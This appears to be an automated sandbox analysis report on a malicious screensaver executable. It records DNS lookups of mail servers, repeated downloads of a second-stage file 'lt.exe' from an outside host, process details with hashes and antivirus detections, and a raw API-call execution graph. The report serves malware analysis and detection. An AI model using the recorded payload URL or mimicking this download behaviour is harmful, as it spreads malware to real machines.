                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.670669079 CET1.1.1.1192.168.2.40x1909No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:27.967988968 CET1.1.1.1192.168.2.40x57ccNo error (0)www4.cedesunjerinkas.com193.166.255.171A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:26:46.294744968 CET1.1.1.1192.168.2.40x8baaNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.858683109 CET1.1.1.1192.168.2.40x5d7bNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.858683109 CET1.1.1.1192.168.2.40x5d7bNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.858683109 CET1.1.1.1192.168.2.40x5d7bNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.858683109 CET1.1.1.1192.168.2.40x5d7bNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.858683109 CET1.1.1.1192.168.2.40x5d7bNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.896532059 CET1.1.1.1192.168.2.40x38d1No error (0)alt2.gmail-smtp-in.l.google.com142.251.9.27A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.904759884 CET1.1.1.1192.168.2.40xa51dNo error (0)alt4.gmail-smtp-in.l.google.com74.125.200.27A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.912798882 CET1.1.1.1192.168.2.40x9fa4No error (0)alt3.gmail-smtp-in.l.google.com142.251.1.26A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.921724081 CET1.1.1.1192.168.2.40x7217No error (0)alt1.gmail-smtp-in.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 15:27:30.932661057 CET1.1.1.1192.168.2.40x34fNo error (0)gmail-smtp-in.l.google.com74.125.206.27A (IP address)IN (0x0001)false
                                                                • www4.cedesunjerinkas.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449731193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:28.065036058 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.449733193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:29.076679945 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449739193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:37.697303057 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.449741193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:46.332851887 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.449742193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:46.335863113 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449744193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:54.958703995 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449745193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:26:54.973681927 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449746193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:03.552293062 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.449747193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:03.583918095 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.449762193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:12.280694008 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.449763193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:12.280836105 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.449807193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:20.884182930 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.449808193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:20.884277105 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.449849193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:29.474132061 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.449850193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:29.489686966 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.449894193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:38.541481972 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.449896193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:38.542469025 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.449936193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:47.207947016 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.449937193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:47.208086967 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.449981193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:55.833419085 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.449982193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:27:55.833657980 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.450027193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:28:04.488432884 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.450028193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:28:04.492134094 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.450036193.166.255.171804192C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:28:13.083667994 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.450037193.166.255.171802256C:\Windows\tserv.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 31, 2024 15:28:13.098790884 CET64OUTGET /chr/wtb/lt.exe HTTP/1.1
                                                                Host: www4.cedesunjerinkas.com


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:10:26:10
                                                                Start date:31/10/2024
                                                                Path:C:\Users\user\Desktop\document.log.scr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\document.log.scr.exe"
                                                                Imagebase:0x400000
                                                                File size:423'046 bytes
                                                                MD5 hash:203E91D369913B5768296E416B0C86D5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:10:26:16
                                                                Start date:31/10/2024
                                                                Path:C:\Windows\tserv.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\tserv.exe s
                                                                Imagebase:0x400000
                                                                File size:423'046 bytes
                                                                MD5 hash:203E91D369913B5768296E416B0C86D5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 95%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:10:26:16
                                                                Start date:31/10/2024
                                                                Path:C:\Windows\SysWOW64\notepad.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp
                                                                Imagebase:0x1a0000
                                                                File size:165'888 bytes
                                                                MD5 hash:E92D3A824A0578A50D2DD81B5060145F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:10:26:35
                                                                Start date:31/10/2024
                                                                Path:C:\Windows\tserv.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\tserv.exe" s
                                                                Imagebase:0x400000
                                                                File size:423'046 bytes
                                                                MD5 hash:203E91D369913B5768296E416B0C86D5
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:4.6%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:16%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:46
                                                                  execution_graph 16122 40e246 16123 40e250 16122->16123 16130 40c1d0 GetTickCount GetTickCount GetTickCount GetTickCount 16123->16130 16125 40ed9f 16126 4028a0 42 API calls 16125->16126 16127 40edc9 16126->16127 16128 424873 _fast_error_exit 36 API calls 16127->16128 16129 40edd8 16128->16129 16130->16125 16078 420ac8 16079 420ad0 GetProcessHeap HeapAlloc RegOpenKeyExA 16078->16079 16081 420f00 16079->16081 16082 420ef1 GetLastError 16079->16082 16083 420f04 RegQueryValueExA 16081->16083 16082->16083 16084 420f32 16083->16084 16085 420f27 GetLastError 16083->16085 16086 420f40 RegCloseKey RegOpenKeyExA 16084->16086 16085->16086 16087 420f60 GetLastError 16086->16087 16088 420f69 RegQueryValueExA 16086->16088 16087->16088 16089 420f92 GetLastError 16088->16089 16090 420fa7 16088->16090 16095 420fc2 16089->16095 16091 42cfce 61 API calls 16090->16091 16091->16095 16092 41f020 11 API calls 16093 42107e 16092->16093 16094 41f100 5 API calls 16093->16094 16096 42108e GetProcessHeap HeapFree RegCloseKey 16094->16096 16095->16092 16097 424873 _fast_error_exit 36 API calls 16096->16097 16098 4210c4 16097->16098 16131 40de56 16132 40de60 16131->16132 16132->16132 16139 40c1d0 GetTickCount GetTickCount GetTickCount GetTickCount 16132->16139 16134 40ed9f 16135 4028a0 42 API calls 16134->16135 16136 40edc9 16135->16136 16137 424873 _fast_error_exit 36 API calls 16136->16137 16138 40edd8 16137->16138 16139->16134 16053 41fad9 16054 41fae0 16053->16054 16054->16054 16055 41fb79 GetProcessHeap HeapAlloc RegOpenKeyExA 16054->16055 16056 41fc24 GetLastError 16055->16056 16057 41fc29 RegQueryValueExA 16055->16057 16056->16057 16058 41fc51 16057->16058 16059 41fc4a GetLastError 16057->16059 16060 425a4d 36 API calls 16058->16060 16077 41fca7 16059->16077 16061 41fc5c 16060->16061 16063 41fc69 16061->16063 16066 4259c0 ___initmbctable 50 API calls 16061->16066 16062 41f020 11 API calls 16064 41fccd 16062->16064 16065 425a4d 36 API calls 16063->16065 16067 41f100 5 API calls 16064->16067 16069 41fc7b 16065->16069 16066->16063 16068 41fcdd GetProcessHeap HeapFree RegCloseKey 16067->16068 16070 424873 _fast_error_exit 36 API calls 16068->16070 16071 41fc88 16069->16071 16073 4259c0 ___initmbctable 50 API calls 16069->16073 16072 41fd45 16070->16072 16074 425a4d 36 API calls 16071->16074 16073->16071 16075 41fc9a 16074->16075 16076 4259c0 ___initmbctable 50 API calls 16075->16076 16075->16077 16076->16077 16077->16062 12646 42d570 12651 41e3a0 12646->12651 12652 41e450 12651->12652 12664 423260 GetProcessHeap HeapAlloc 12652->12664 12654 41ee55 12655 41ee59 12654->12655 12656 41ee5f CreateEventA CreateEventA CreateEventA CreateEventA CreateEventA 12654->12656 12655->12656 12706 4237e0 GetVersionExA 12656->12706 12658 41eedf 12707 424873 12658->12707 12661 42570f 12867 4256d7 12661->12867 12663 425718 12665 4232d3 HeapAlloc 12664->12665 12666 4232bf 12664->12666 12668 423306 HeapAlloc 12665->12668 12669 4232e4 HeapFree 12665->12669 12667 424873 _fast_error_exit 36 API calls 12666->12667 12672 4232cd 12667->12672 12670 423344 HeapAlloc 12668->12670 12671 42331a HeapFree 12668->12671 12673 424873 _fast_error_exit 36 API calls 12669->12673 12675 423356 HeapFree HeapFree 12670->12675 12676 42336e HeapAlloc 12670->12676 12674 42332a HeapFree 12671->12674 12672->12654 12677 423300 12673->12677 12678 42332f 12674->12678 12675->12674 12679 42339f HeapAlloc 12676->12679 12680 42337d HeapFree HeapFree HeapFree 12676->12680 12677->12654 12681 424873 _fast_error_exit 36 API calls 12678->12681 12682 4233df InitializeSecurityDescriptor 12679->12682 12683 4233af HeapFree HeapFree HeapFree HeapFree 12679->12683 12680->12674 12684 42333e 12681->12684 12682->12678 12685 42340b GetCurrentProcess OpenProcessToken 12682->12685 12683->12674 12684->12654 12685->12678 12686 42342a GetTokenInformation 12685->12686 12686->12678 12687 42344c GetTokenInformation 12686->12687 12687->12678 12688 42346c GetTokenInformation 12687->12688 12688->12678 12689 42348c 12688->12689 12689->12678 12690 423496 SetSecurityDescriptorOwner 12689->12690 12690->12678 12691 4234ab 12690->12691 12691->12678 12692 4234b9 SetSecurityDescriptorGroup 12691->12692 12692->12678 12693 4234ce AllocateAndInitializeSid 12692->12693 12693->12678 12694 4234fb 12693->12694 12694->12678 12695 423507 GetLengthSid AddAce 12694->12695 12695->12678 12696 4235b6 AllocateAndInitializeSid 12695->12696 12696->12678 12697 4235fd 12696->12697 12697->12678 12698 423609 GetLengthSid AddAce 12697->12698 12698->12678 12699 4236cd AllocateAndInitializeSid 12698->12699 12699->12678 12700 423712 12699->12700 12700->12678 12701 42371e GetLengthSid AddAce 12700->12701 12701->12678 12702 423799 IsValidSecurityDescriptor 12701->12702 12702->12678 12703 4237bc 12702->12703 12704 424873 _fast_error_exit 36 API calls 12703->12704 12705 4237d7 12704->12705 12705->12654 12706->12658 12708 41eef1 12707->12708 12709 424842 ___initmbctable 12707->12709 12708->12661 12713 426501 12709->12713 12714 426510 ___initmbctable 12713->12714 12715 426572 GetModuleFileNameA 12714->12715 12716 426523 12714->12716 12719 42658c _strcat _fast_error_exit _strncpy _strlen 12715->12719 12728 429328 12716->12728 12721 42add1 12719->12721 12722 42ade4 LoadLibraryA 12721->12722 12727 42ae51 12721->12727 12723 42adf9 GetProcAddress 12722->12723 12722->12727 12724 42ae10 GetProcAddress GetProcAddress 12723->12724 12723->12727 12725 42ae33 GetProcAddress 12724->12725 12724->12727 12726 42ae44 GetProcAddress 12725->12726 12725->12727 12726->12727 12727->12716 12731 429254 12728->12731 12730 426648 12732 429260 ___initmbctable 12731->12732 12741 42758b 12732->12741 12734 429267 12735 429278 GetCurrentProcess TerminateProcess 12734->12735 12736 429288 _fast_error_exit 12734->12736 12735->12736 12748 429303 12736->12748 12739 4292fe ___initmbctable 12739->12730 12742 4275b1 EnterCriticalSection 12741->12742 12743 42759e 12741->12743 12742->12734 12756 4274eb 12743->12756 12745 4275a4 12745->12742 12777 425d48 12745->12777 12749 4292eb 12748->12749 12750 429308 12748->12750 12749->12739 12752 429190 GetModuleHandleA 12749->12752 12866 4274d6 LeaveCriticalSection 12750->12866 12753 4291b5 ExitProcess 12752->12753 12754 42919f GetProcAddress 12752->12754 12754->12753 12755 4291af 12754->12755 12755->12753 12757 4274f7 ___initmbctable 12756->12757 12776 42751a __lock ___initmbctable 12757->12776 12783 4263b4 12757->12783 12760 427522 12763 42758b __lock 36 API calls 12760->12763 12761 427515 12786 429d61 12761->12786 12764 427529 12763->12764 12765 427531 12764->12765 12766 427569 12764->12766 12789 42b4df 12765->12789 12767 4255be ___free_lc_time 36 API calls 12766->12767 12769 427565 12767->12769 12804 427582 12769->12804 12770 42753c 12770->12769 12771 427542 12770->12771 12794 4255be 12771->12794 12774 427548 12775 429d61 __lock 36 API calls 12774->12775 12775->12776 12776->12745 12778 425d51 12777->12778 12779 425d56 12777->12779 12849 42a55a 12778->12849 12855 42a3e3 12779->12855 12807 426388 12783->12807 12821 426f68 GetLastError FlsGetValue 12786->12821 12788 429d66 12788->12776 12790 42b4eb ___initmbctable 12789->12790 12791 42b4fd GetModuleHandleA 12790->12791 12793 42b521 ___initmbctable 12790->12793 12792 42b50c GetProcAddress 12791->12792 12791->12793 12792->12793 12793->12770 12795 4255ca ___initmbctable 12794->12795 12796 425629 ___initmbctable 12795->12796 12798 42758b __lock 35 API calls 12795->12798 12803 425606 12795->12803 12796->12774 12797 42561b HeapFree 12797->12796 12799 4255e1 ___free_lc_time 12798->12799 12800 4255fb 12799->12800 12838 428533 12799->12838 12844 425611 12800->12844 12803->12796 12803->12797 12848 4274d6 LeaveCriticalSection 12804->12848 12806 427589 12806->12776 12809 4263b1 12807->12809 12810 42638f __getbuf 12807->12810 12809->12760 12809->12761 12810->12809 12811 42630d 12810->12811 12813 426319 ___initmbctable 12811->12813 12812 42634c 12814 426367 HeapAlloc 12812->12814 12816 426376 ___initmbctable 12812->12816 12813->12812 12815 42758b __lock 35 API calls 12813->12815 12814->12816 12817 426334 12815->12817 12816->12810 12818 428ce7 __getbuf 5 API calls 12817->12818 12819 42633f 12818->12819 12820 42637f __getbuf LeaveCriticalSection 12819->12820 12820->12812 12822 426f84 12821->12822 12823 426fcd SetLastError 12821->12823 12831 42af1a 12822->12831 12823->12788 12825 426f90 12826 426fc5 12825->12826 12827 426f98 FlsSetValue 12825->12827 12829 425d48 __lock 31 API calls 12826->12829 12827->12826 12828 426fa9 GetCurrentThreadId 12827->12828 12828->12823 12830 426fcc 12829->12830 12830->12823 12837 42af26 __getbuf ___initmbctable 12831->12837 12832 42af93 HeapAlloc 12832->12837 12833 42758b __lock 35 API calls 12833->12837 12834 42afbf ___initmbctable 12834->12825 12835 428ce7 __getbuf 5 API calls 12835->12837 12836 42afc4 __lock LeaveCriticalSection 12836->12837 12837->12832 12837->12833 12837->12834 12837->12835 12837->12836 12839 428570 12838->12839 12843 428816 ___free_lc_time 12838->12843 12840 42875c VirtualFree 12839->12840 12839->12843 12841 4287c0 12840->12841 12842 4287cf VirtualFree HeapFree 12841->12842 12841->12843 12842->12843 12843->12800 12847 4274d6 LeaveCriticalSection 12844->12847 12846 425618 12846->12803 12847->12846 12848->12806 12850 42a564 12849->12850 12851 42a591 12850->12851 12852 42a3e3 _fast_error_exit 36 API calls 12850->12852 12851->12779 12853 42a57b 12852->12853 12854 42a3e3 _fast_error_exit 36 API calls 12853->12854 12854->12851 12858 42a409 12855->12858 12856 424873 _fast_error_exit 33 API calls 12859 425d5f 12856->12859 12857 42a516 _strlen 12861 42a52b GetStdHandle WriteFile 12857->12861 12858->12857 12860 42a448 12858->12860 12865 42a511 12858->12865 12859->12742 12862 42a454 GetModuleFileNameA 12860->12862 12860->12865 12861->12865 12863 42a46e _strcat _fast_error_exit _strncpy _strlen 12862->12863 12864 42add1 _fast_error_exit 6 API calls 12863->12864 12864->12865 12865->12856 12866->12749 12868 4256e3 ___initmbctable 12867->12868 12875 4291c0 12868->12875 12874 425700 ___initmbctable 12874->12663 12876 42758b __lock 36 API calls 12875->12876 12877 4256e8 12876->12877 12878 42562f 12877->12878 12888 429357 12878->12888 12880 42563b 12884 42567d 12880->12884 12896 428fe3 12880->12896 12882 425668 12883 428fe3 39 API calls 12882->12883 12882->12884 12883->12884 12885 425709 12884->12885 12940 4291c9 12885->12940 12889 429363 ___initmbctable 12888->12889 12890 4293a6 HeapSize 12889->12890 12892 42758b __lock 36 API calls 12889->12892 12891 4293b9 ___initmbctable 12890->12891 12891->12880 12893 429373 ___free_lc_time 12892->12893 12914 4293c4 12893->12914 12897 428fef ___initmbctable 12896->12897 12898 429006 12897->12898 12899 428ff8 12897->12899 12900 429019 12898->12900 12901 42900d 12898->12901 12902 4263b4 __getbuf 36 API calls 12899->12902 12907 429154 __getbuf 12900->12907 12913 429026 __getbuf ___sbh_resize_block ___free_lc_time 12900->12913 12903 4255be ___free_lc_time 36 API calls 12901->12903 12904 429000 ___initmbctable 12902->12904 12903->12904 12904->12882 12905 429162 HeapReAlloc 12905->12907 12906 42758b __lock 36 API calls 12906->12913 12907->12904 12907->12905 12909 4290b2 HeapAlloc 12909->12913 12910 429108 HeapReAlloc 12910->12913 12912 428533 VirtualFree VirtualFree HeapFree ___free_lc_time 12912->12913 12913->12904 12913->12906 12913->12909 12913->12910 12913->12912 12918 428ce7 12913->12918 12924 42914b 12913->12924 12917 4274d6 LeaveCriticalSection 12914->12917 12916 4293a0 12916->12890 12916->12891 12917->12916 12921 428d19 12918->12921 12919 428d81 12919->12913 12921->12919 12923 428e3c 12921->12923 12927 42884b 12921->12927 12923->12919 12935 428902 12923->12935 12939 4274d6 LeaveCriticalSection 12924->12939 12926 429152 12926->12913 12928 428891 HeapAlloc 12927->12928 12929 42885d HeapReAlloc 12927->12929 12932 4288b8 12928->12932 12933 4288bc VirtualAlloc 12928->12933 12930 428880 12929->12930 12931 42887c 12929->12931 12930->12928 12931->12923 12932->12923 12933->12932 12934 4288d6 HeapFree 12933->12934 12934->12932 12936 428917 VirtualAlloc 12935->12936 12938 42895e 12936->12938 12938->12919 12939->12926 12943 4274d6 LeaveCriticalSection 12940->12943 12942 42570e 12942->12874 12943->12942 12944 425d91 12945 425d9d ___initmbctable _fast_error_exit 12944->12945 12946 425da9 GetVersionExA 12945->12946 12947 425df1 GetModuleHandleA 12946->12947 12948 425de5 12946->12948 12949 425e0d 12947->12949 12948->12947 12987 42846f HeapCreate 12949->12987 12951 425e5f 12952 425e6b 12951->12952 13135 425d6d 12951->13135 12995 427120 12952->12995 12955 425e71 12956 425e7c 12955->12956 12957 425d6d _fast_error_exit 36 API calls 12955->12957 13013 42ab4b 12956->13013 12957->12956 12960 425e96 GetCommandLineA 13030 42aa29 12960->13030 12962 425d48 __lock 36 API calls 12964 425e95 12962->12964 12964->12960 12966 425eb0 12967 425ebb 12966->12967 12968 425d48 __lock 36 API calls 12966->12968 13060 42a754 12967->13060 12968->12967 12971 425ecc 13072 4291ea 12971->13072 12972 425d48 __lock 36 API calls 12972->12971 12975 425ee3 GetStartupInfoA 13076 42a6f7 12975->13076 12976 425d48 __lock 36 API calls 12978 425ee2 12976->12978 12978->12975 12979 425ef5 GetModuleHandleA 13080 415060 12979->13080 12982 425f15 12983 425f25 12982->12983 13132 429317 12982->13132 13143 429339 12983->13143 12986 425f2a ___initmbctable 12988 4284b9 12987->12988 12989 42848f 12987->12989 12988->12951 12990 42849e 12989->12990 12991 4284bc 12989->12991 13146 4284c0 HeapAlloc 12990->13146 12991->12951 12994 4284ad HeapDestroy 12994->12988 13148 427438 12995->13148 12998 427131 GetModuleHandleA 13001 427144 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12998->13001 13002 4271af FlsAlloc 12998->13002 12999 427129 13152 426f4b 12999->13152 13001->13002 13006 427187 13001->13006 13003 4271c4 13002->13003 13004 427205 13002->13004 13007 42af1a __lock 36 API calls 13003->13007 13008 426f4b 39 API calls 13004->13008 13006->13002 13009 4271d2 13007->13009 13010 42720a 13008->13010 13009->13004 13011 4271da FlsSetValue 13009->13011 13010->12955 13011->13004 13012 4271eb GetCurrentThreadId 13011->13012 13012->13010 13014 4263b4 __getbuf 36 API calls 13013->13014 13016 42ab5a 13014->13016 13015 42aba0 GetStartupInfoA 13023 42aca3 13015->13023 13026 42abba 13015->13026 13016->13015 13020 425e8a 13016->13020 13017 42ad33 SetHandleCount 13017->13020 13018 42acd2 GetStdHandle 13021 42ace0 GetFileType 13018->13021 13018->13023 13019 4263b4 __getbuf 36 API calls 13019->13026 13020->12960 13020->12962 13021->13023 13022 42ac2b 